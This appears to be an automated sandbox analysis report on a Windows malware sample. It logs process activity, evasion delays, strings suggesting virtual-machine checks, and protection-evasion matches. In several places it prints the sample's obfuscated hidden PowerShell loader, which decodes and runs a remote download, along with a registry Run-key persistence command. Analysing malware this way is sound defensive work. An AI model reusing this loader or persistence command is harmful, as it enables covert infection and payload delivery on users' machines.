Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6090 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3725 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5857 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3999 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5664 Thread sleep time: -3689348814741908s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6384 Thread sleep time: -5534023222112862s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4528 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6020 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0 Jump to behavior
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: powershell.exe, 00000005.00000002.3357849866.0000000004AB6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $Lr$Hyper-V Volume Shadow Copy Requestor
Source: powershell.exe, 00000005.00000002.3357849866.0000000004AB6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $Lr$Hyper-V Time Synchronization Service
Source: powershell.exe, 00000002.00000002.1017565035.000001E69BB18000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: BStopped vmicshutdown Hyper-V Guest Shutdown Service
Source: powershell.exe, 00000002.00000002.1017565035.000001E69BB18000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: BStopped vmicheartbeat Hyper-V Heartbeat Service
Source: powershell.exe, 00000002.00000002.1017565035.000001E69BB18000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: BStopped vmicvmsession Hyper-V PowerShell Direct Service
Source: powershell.exe, 00000002.00000002.1017565035.000001E69BB18000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicvss
Source: powershell.exe, 00000002.00000002.1017565035.000001E69BB18000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: &Hyper-V Remote Desktop Virtualizati...
Source: powershell.exe, 00000002.00000002.1017565035.000001E69BB18000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: BStopped vmicrdv Hyper-V Remote Desktop Virtualizati...
Source: powershell.exe, 00000005.00000002.3357849866.0000000004AB6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $Lr-Hyper-V Remote Desktop Virtualization Service
Source: powershell.exe, 00000005.00000002.3383686166.0000000008339000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3354236670.0000000002B83000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2815670292.000001B267A55000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2815228644.000001B26242B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2815630981.000001B267A43000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000002.00000002.1017565035.000001E69BB18000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: BStopped vmicguestinterface Hyper-V Guest Service Interface
Source: powershell.exe, 00000002.00000002.1017565035.000001E69BB18000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: #Hyper-V Remote Desktop Virtualizati
Source: powershell.exe, 00000002.00000002.1017565035.000001E69BB18000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: &Hyper-V Guest Shutdown Service
Source: powershell.exe, 00000002.00000002.1017565035.000001E69BB18000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: &Hyper-V Guest Service Interface
Source: powershell.exe, 00000002.00000002.1017565035.000001E69A1BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1017565035.000001E69B118000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3357849866.0000000004AB6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: powershell.exe, 00000002.00000002.1063879880.000001E6B222C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000002.00000002.1017565035.000001E69BB18000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: &Hyper-V Heartbeat Service
Source: powershell.exe, 00000002.00000002.1017565035.000001E69A1BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1017565035.000001E69B118000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3357849866.0000000004AB6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: powershell.exe, 00000005.00000002.3383686166.0000000008304000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWX
Source: powershell.exe, 00000005.00000002.3357849866.0000000004AB6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicshutdown
Source: powershell.exe, 00000002.00000002.1017565035.000001E69BB18000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: &Hyper-V PowerShell Direct Service
Source: powershell.exe, 00000002.00000002.1017565035.000001E69BB18000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: &Hyper-V Data Exchange Service
Source: powershell.exe, 00000002.00000002.1017565035.000001E69A1BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1017565035.000001E69B118000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $Hyper-V Time Synchronization Service
Source: powershell.exe, 00000002.00000002.1017565035.000001E69A1BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1017565035.000001E69B118000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $Hyper-V Volume Shadow Copy Requestor
Source: powershell.exe, 00000005.00000002.3357849866.0000000004AB6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicvss
Source: powershell.exe, 00000005.00000002.3357849866.0000000004AB6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $Lr!Hyper-V PowerShell Direct Service
Source: powershell.exe, 00000002.00000002.1017565035.000001E69BB18000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: BStopped vmictimesync Hyper-V Time Synchronization Service
Source: powershell.exe, 00000002.00000002.1017565035.000001E69BB18000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicheartbeat
Source: powershell.exe, 00000002.00000002.1017565035.000001E69BB18000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicshutdown
Source: powershell.exe, 00000002.00000002.1017565035.000001E69BB18000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Stopped vmicvss
Source: powershell.exe, 00000002.00000002.1017565035.000001E69A1BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1017565035.000001E69B118000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3357849866.0000000004AB6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: powershell.exe, 00000002.00000002.1017565035.000001E69BB18000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: BStopped vmicvss Hyper-V Volume Shadow Copy Requestor
Source: powershell.exe, 00000002.00000002.1017565035.000001E69A1BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1017565035.000001E69B118000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: !Hyper-V PowerShell Direct Service
Source: powershell.exe, 00000002.00000002.1017565035.000001E69BB18000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: BStopped vmickvpexchange Hyper-V Data Exchange Service
Source: powershell.exe, 00000002.00000002.1017565035.000001E69BB18000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: &Hyper-V Volume Shadow Copy Requestor
Source: powershell.exe, 00000002.00000002.1017565035.000001E69A1BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1017565035.000001E69B118000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3357849866.0000000004AB6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: powershell.exe, 00000002.00000002.1017565035.000001E69A1BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1017565035.000001E69B118000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: -Hyper-V Remote Desktop Virtualization Service
Source: powershell.exe, 00000002.00000002.1017565035.000001E69BB18000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: &Hyper-V Time Synchronization Service
Source: powershell.exe, 00000005.00000002.3357849866.0000000004AB6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicheartbeat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_02DDD6E4 LdrInitializeThunk, 5_2_02DDD6E4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: Yara match File source: amsi64_1904.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: powershell.exe PID: 1904, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5952, type: MEMORYSTR
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "Get-Service;$Unsegregated97='func';Get-History;$Unsegregated97+='t';Get-History;$Unsegregated97+='i';Get-History;$Unsegregated97+='on:';(ni -p $Unsegregated97 -n Desperates -value { param($Vanskeligt);$Batel=2;do {$Skraaplanernes+=$Vanskeligt[$Batel];$Batel+=3} until(!$Vanskeligt[$Batel])$Skraaplanernes});ConvertTo-Html;(ni -p $Unsegregated97 -n Afsvoret -value {param($Paliphrasia);.($Farsering) ($Paliphrasia)});ConvertTo-Html;$Fjernsynsudsendelser=Desperates 'udNHae et ..SpW';$Fjernsynsudsendelser+=Desperates 'ine bCeCAnL SiPeeH nPrT';$Shopped=Desperates 'hjMTeo VzBoiKel,ol a a/';$Livener89=Desperates 'AnTLel DsCe1 2';$Breaming=' r[ aNsiE .t .. .SH E.rrLiVUnI HcAqeN,p So.eiTonFatGem aAU NO,AStGC,EEyRDe]Gr:Pl:.xsErELic,nUXir ib,tScyT p ArTroUrTinoMaCD oS lA =Pu$ImLCoi.rVFle Sn OEBlRT.8Hl9';$Shopped+=Desperates 'Fl5 ,. s0Pe Ov(YaWReiAnn d aoRiw .sKi oNGlT r Fo1 0 l. H0Ke;S, hWfuiKnnUn6Fj4S.;Sy Anxr,6U.4 i;Sk ParRov.d: P1Le3Pu4Ao.Ep0 s)Ol S GVie AcSvkOuoEj/ C2 0 I1.e0 a0p 1 .0Un1Ov UdFTaiRerF ejefUnoWrxDd/,u1 k3U 4Th.Li0';$Batelgangstningen=Desperates 'V,UAaSSae.eRRa-AnA gMiEPiN CT';$Hepatic=Desperates ' Bh nt,rtOvpS s P:Rv/Sv/ SwFowT wIn..aaOreKununnA,aPiaP,rVat n. UdspeRe/Dow .p ,c ao hnentSpeKun,otP /Daf ti lF.eP s /MapdirTaiBevD aDatU eAl/g ddao Vw AnDel no a ndFi/ eGInlJoaFas ee MrUreGlnSudRee ,.Ruc Oh ,m';$Chatollet=Desperates 'Mo>';$Farsering=Desperates 'StIStE,iX';$Awatch='Perfideste';$aabenbaringsreligionen='\stinko.Tet';Afsvoret (Desperates 'D,$ SGAnl SO TB,paUnlV,:SnCCuAspr,aPHaeH TUnL BEFoSCiS B=do$DoeD n VS.:Soa upElpInDUnA mtY aKr+Tr$BraAdaC.bEke N,aBOrA,cR QILanTuGBrSO.r ee llH I.oGA,I.eOk n oeReN');Afsvoret (Desperates ' $ ogUpLSwo.ubNraShlSe:KlP aR.ho oC EUrDgeUR RHjE gkGlajalAndGosAg=Fi$TeHA eFopA aIsT liCacF ..aSMypAgltaIFotHe(C $ CCsthSgAT,TUno AlCulUdEP tPo)');Afsvoret (Desperates $Breaming);$Hepatic=$Procedurekalds[0];$Colberter=(Desperates 'Bo$NyG dLCho rb AASuLFr: PFSyAE rCoVInADrNSeDEkeI.=Rendee wEl-Drot b.ij tE McCrTK. Pes yRosBitFoe SMKl.R $Blf JOpE aRpoNP sSvyHanBaS.nU,rd SMeEPun FD,rEm LBes EEEnR');Afsvoret ($Colberter);Afsvoret (Desperates 'No$T F Sa ir qv Ga n odTieMa. BH oeJoaJodSlechrOpsTo[F $FeBK,aS.tIteKolCag paEnnA,gA sF,tSen liUdn og ePen L]Br= $R,SC h Ao DpBipO eE d');$Coumaphos=Desperates 'Kl$ IFUraForH v UaAcns,d.aeFi.ExD og w n ElFloSpaM dInF NiRel reSe(Ko$LkHSfe ApFoaSkt wiRec,p,Un$ .EBrfChfO r.aae y )';$Effray=$carpetless;Afsvoret (Desperates ' K$ SGUdL LO Tb FAPhlC,: UhSuaLuGBab.rUS T i=Ap(S.tgeeS,sI tS -OrpAfaMotteHVi S,$Une ,f AFRerLsa.nyBr)');while (!$Hagbut) {Afsvoret (Desperates 'Ma$YpgS lBrogebCaaInlS,: UBSklLaoBekBetStrYvyAfkSls T= e$.oD FieclS,iDeg FeA nSucU e SnSts') ;Afsvoret $Coumaphos;Afsvoret (Desperates 'Co[ToT lH rT,E,eA eD,riS nmhg f. StS HstR.ie UaStDGa]S :Br:i s ClMeEArE SpAr(M.4Ch0Tr0P.0D.)');Afsvoret (Desperates 'U $,eGS.lHjo eB eAInl r: kh aaTrgGlbAfuOlTTa=De(Frt Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Mystery" /t REG_EXPAND_SZ /d "%Sundhedstjeneste% -windowstyle 1 $Uforligneliges155=(gi 'HKCU:\Software\Rnefolk\').GetValue('Noncooperation');%Sundhedstjeneste% ($Uforligneliges155)" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Mystery" /t REG_EXPAND_SZ /d "%Sundhedstjeneste% -windowstyle 1 $Uforligneliges155=(gi 'HKCU:\Software\Rnefolk\').GetValue('Noncooperation');%Sundhedstjeneste% ($Uforligneliges155)" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "get-service;$unsegregated97='func';get-history;$unsegregated97+='t';get-history;$unsegregated97+='i';get-history;$unsegregated97+='on:';(ni -p $unsegregated97 -n desperates -value { param($vanskeligt);$batel=2;do {$skraaplanernes+=$vanskeligt[$batel];$batel+=3} until(!$vanskeligt[$batel])$skraaplanernes});convertto-html;(ni -p $unsegregated97 -n afsvoret -value {param($paliphrasia);.($farsering) ($paliphrasia)});convertto-html;$fjernsynsudsendelser=desperates 'udnhae et ..spw';$fjernsynsudsendelser+=desperates 'ine bcecanl sipeeh nprt';$shopped=desperates 'hjmteo vzboikel,ol a a/';$livener89=desperates 'antlel dsce1 2';$breaming=' r[ ansie .t .. .sh e.rrlivuni hcaqen,p so.eitonfatgem aau no,astgc,eeyrde]gr:pl:.xserelic,nuxir ib,tscyt p artrourtinomacd os la =pu$imlcoi.rvfle sn oeblrt.8hl9';$shopped+=desperates 'fl5 ,. s0pe ov(yawreiann d aoriw .ski onglt r fo1 0 l. h0ke;s, hwfuiknnun6fj4s.;sy anxr,6u.4 i;sk parrov.d: p1le3pu4ao.ep0 s)ol s gvie acsvkouoej/ c2 0 i1.e0 a0p 1 .0un1ov udftairerf ejefunowrxdd/,u1 k3u 4th.li0';$batelgangstningen=desperates 'v,uaassae.erra-ana gmiepin ct';$hepatic=desperates ' bh nt,rtovps s p:rv/sv/ swfowt win..aaorekununna,apiap,rvat n. udspere/dow .p ,c ao hnentspekun,otp /daf ti lf.ep s /mapdirtaibevd adatu eal/g ddao vw andel no a ndfi/ eginljoafas ee mrureglnsudree ,.ruc oh ,m';$chatollet=desperates 'mo>';$farsering=desperates 'stiste,ix';$awatch='perfideste';$aabenbaringsreligionen='\stinko.tet';afsvoret (desperates 'd,$ sganl so tb,paunlv,:snccuaspr,aphaeh tunl befoscis b=do$doed n vs.:soa upelpinduna mty akr+tr$braadac.beke n,abora,cr qilantugbrso.r ee llh i.oga,i.eok n oeren');afsvoret (desperates ' $ oguplswo.ubnrashlse:klp ar.ho oc eurdgeur rhje gkglajalandgosag=fi$teha efopa aist licacf ..asmypagltaifothe(c $ ccsthsgat,tuno alculudep tpo)');afsvoret (desperates $breaming);$hepatic=$procedurekalds[0];$colberter=(desperates 'bo$nyg dlcho rb aasulfr: pfsyae rcovinadrnsedekei.=rendee wel-drot b.ij te mccrtk. pes yrosbitfoe smkl.r $blf jope arponp ssvyhanbas.nu,rd smeepun fd,rem lbes eeenr');afsvoret ($colberter);afsvoret (desperates 'no$t f sa ir qv ga n odtiema. bh oejoajodslechropsto[f $febk,as.titekolcag paenna,ga sf,tsen liudn og epen l]br= $r,sc h ao dpbipo ee d');$coumaphos=desperates 'kl$ ifuraforh v uaacns,d.aefi.exd og w n elflospam dinf nirel rese(ko$lkhsfe apfoaskt wirec,p,un$ .ebrfchfo r.aae y )';$effray=$carpetless;afsvoret (desperates ' k$ sgudl lo tb faphlc,: uhsualugbab.rus t i=ap(s.tgees,si ts -orpafamottehvi s,$une ,f afrerlsa.nybr)');while (!$hagbut) {afsvoret (desperates 'ma$ypgs lbrogebcaainls,: ubskllaobekbetstryvyafksls t= e$.od fiecls,ideg fea nsucu e snsts') ;afsvoret $coumaphos;afsvoret (desperates 'co[tot lh rt,e,ea ed,ris nmhg f. sts hstr.ie uastdga]s :br:i s clmeeare spar(m.4ch0tr0p.0d.)');afsvoret (desperates 'u $,egs.lhjo eb eainl r: kh aatrgglbafuoltta=de(frt
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "get-service;$unsegregated97='func';get-history;$unsegregated97+='t';get-history;$unsegregated97+='i';get-history;$unsegregated97+='on:';(ni -p $unsegregated97 -n desperates -value { param($vanskeligt);$batel=2;do {$skraaplanernes+=$vanskeligt[$batel];$batel+=3} until(!$vanskeligt[$batel])$skraaplanernes});convertto-html;(ni -p $unsegregated97 -n afsvoret -value {param($paliphrasia);.($farsering) ($paliphrasia)});convertto-html;$fjernsynsudsendelser=desperates 'udnhae et ..spw';$fjernsynsudsendelser+=desperates 'ine bcecanl sipeeh nprt';$shopped=desperates 'hjmteo vzboikel,ol a a/';$livener89=desperates 'antlel dsce1 2';$breaming=' r[ ansie .t .. .sh e.rrlivuni hcaqen,p so.eitonfatgem aau no,astgc,eeyrde]gr:pl:.xserelic,nuxir ib,tscyt p artrourtinomacd os la =pu$imlcoi.rvfle sn oeblrt.8hl9';$shopped+=desperates 'fl5 ,. s0pe ov(yawreiann d aoriw .ski onglt r fo1 0 l. h0ke;s, hwfuiknnun6fj4s.;sy anxr,6u.4 i;sk parrov.d: p1le3pu4ao.ep0 s)ol s gvie acsvkouoej/ c2 0 i1.e0 a0p 1 .0un1ov udftairerf ejefunowrxdd/,u1 k3u 4th.li0';$batelgangstningen=desperates 'v,uaassae.erra-ana gmiepin ct';$hepatic=desperates ' bh nt,rtovps s p:rv/sv/ swfowt win..aaorekununna,apiap,rvat n. udspere/dow .p ,c ao hnentspekun,otp /daf ti lf.ep s /mapdirtaibevd adatu eal/g ddao vw andel no a ndfi/ eginljoafas ee mrureglnsudree ,.ruc oh ,m';$chatollet=desperates 'mo>';$farsering=desperates 'stiste,ix';$awatch='perfideste';$aabenbaringsreligionen='\stinko.tet';afsvoret (desperates 'd,$ sganl so tb,paunlv,:snccuaspr,aphaeh tunl befoscis b=do$doed n vs.:soa upelpinduna mty akr+tr$braadac.beke n,abora,cr qilantugbrso.r ee llh i.oga,i.eok n oeren');afsvoret (desperates ' $ oguplswo.ubnrashlse:klp ar.ho oc eurdgeur rhje gkglajalandgosag=fi$teha efopa aist licacf ..asmypagltaifothe(c $ ccsthsgat,tuno alculudep tpo)');afsvoret (desperates $breaming);$hepatic=$procedurekalds[0];$colberter=(desperates 'bo$nyg dlcho rb aasulfr: pfsyae rcovinadrnsedekei.=rendee wel-drot b.ij te mccrtk. pes yrosbitfoe smkl.r $blf jope arponp ssvyhanbas.nu,rd smeepun fd,rem lbes eeenr');afsvoret ($colberter);afsvoret (desperates 'no$t f sa ir qv ga n odtiema. bh oejoajodslechropsto[f $febk,as.titekolcag paenna,ga sf,tsen liudn og epen l]br= $r,sc h ao dpbipo ee d');$coumaphos=desperates 'kl$ ifuraforh v uaacns,d.aefi.exd og w n elflospam dinf nirel rese(ko$lkhsfe apfoaskt wirec,p,un$ .ebrfchfo r.aae y )';$effray=$carpetless;afsvoret (desperates ' k$ sgudl lo tb faphlc,: uhsualugbab.rus t i=ap(s.tgees,si ts -orpafamottehvi s,$une ,f afrerlsa.nybr)');while (!$hagbut) {afsvoret (desperates 'ma$ypgs lbrogebcaainls,: ubskllaobekbetstryvyafksls t= e$.od fiecls,ideg fea nsucu e snsts') ;afsvoret $coumaphos;afsvoret (desperates 'co[tot lh rt,e,ea ed,ris nmhg f. sts hstr.ie uastdga]s :br:i s clmeeare spar(m.4ch0tr0p.0d.)');afsvoret (desperates 'u $,egs.lhjo eb eainl r: kh
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add "hkcu\software\microsoft\windows\currentversion\run" /f /v "mystery" /t reg_expand_sz /d "%sundhedstjeneste% -windowstyle 1 $uforligneliges155=(gi 'hkcu:\software\rnefolk\').getvalue('noncooperation');%sundhedstjeneste% ($uforligneliges155)"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "get-service;$unsegregated97='func';get-history;$unsegregated97+='t';get-history;$unsegregated97+='i';get-history;$unsegregated97+='on:';(ni -p $unsegregated97 -n desperates -value { param($vanskeligt);$batel=2;do {$skraaplanernes+=$vanskeligt[$batel];$batel+=3} until(!$vanskeligt[$batel])$skraaplanernes});convertto-html;(ni -p $unsegregated97 -n afsvoret -value {param($paliphrasia);.($farsering) ($paliphrasia)});convertto-html;$fjernsynsudsendelser=desperates 'udnhae et ..spw';$fjernsynsudsendelser+=desperates 'ine bcecanl sipeeh nprt';$shopped=desperates 'hjmteo vzboikel,ol a a/';$livener89=desperates 'antlel dsce1 2';$breaming=' r[ ansie .t .. .sh e.rrlivuni hcaqen,p so.eitonfatgem aau no,astgc,eeyrde]gr:pl:.xserelic,nuxir ib,tscyt p artrourtinomacd os la =pu$imlcoi.rvfle sn oeblrt.8hl9';$shopped+=desperates 'fl5 ,. s0pe ov(yawreiann d aoriw .ski onglt r fo1 0 l. h0ke;s, hwfuiknnun6fj4s.;sy anxr,6u.4 i;sk parrov.d: p1le3pu4ao.ep0 s)ol s gvie acsvkouoej/ c2 0 i1.e0 a0p 1 .0un1ov udftairerf ejefunowrxdd/,u1 k3u 4th.li0';$batelgangstningen=desperates 'v,uaassae.erra-ana gmiepin ct';$hepatic=desperates ' bh nt,rtovps s p:rv/sv/ swfowt win..aaorekununna,apiap,rvat n. udspere/dow .p ,c ao hnentspekun,otp /daf ti lf.ep s /mapdirtaibevd adatu eal/g ddao vw andel no a ndfi/ eginljoafas ee mrureglnsudree ,.ruc oh ,m';$chatollet=desperates 'mo>';$farsering=desperates 'stiste,ix';$awatch='perfideste';$aabenbaringsreligionen='\stinko.tet';afsvoret (desperates 'd,$ sganl so tb,paunlv,:snccuaspr,aphaeh tunl befoscis b=do$doed n vs.:soa upelpinduna mty akr+tr$braadac.beke n,abora,cr qilantugbrso.r ee llh i.oga,i.eok n oeren');afsvoret (desperates ' $ oguplswo.ubnrashlse:klp ar.ho oc eurdgeur rhje gkglajalandgosag=fi$teha efopa aist licacf ..asmypagltaifothe(c $ ccsthsgat,tuno alculudep tpo)');afsvoret (desperates $breaming);$hepatic=$procedurekalds[0];$colberter=(desperates 'bo$nyg dlcho rb aasulfr: pfsyae rcovinadrnsedekei.=rendee wel-drot b.ij te mccrtk. pes yrosbitfoe smkl.r $blf jope arponp ssvyhanbas.nu,rd smeepun fd,rem lbes eeenr');afsvoret ($colberter);afsvoret (desperates 'no$t f sa ir qv ga n odtiema. bh oejoajodslechropsto[f $febk,as.titekolcag paenna,ga sf,tsen liudn og epen l]br= $r,sc h ao dpbipo ee d');$coumaphos=desperates 'kl$ ifuraforh v uaacns,d.aefi.exd og 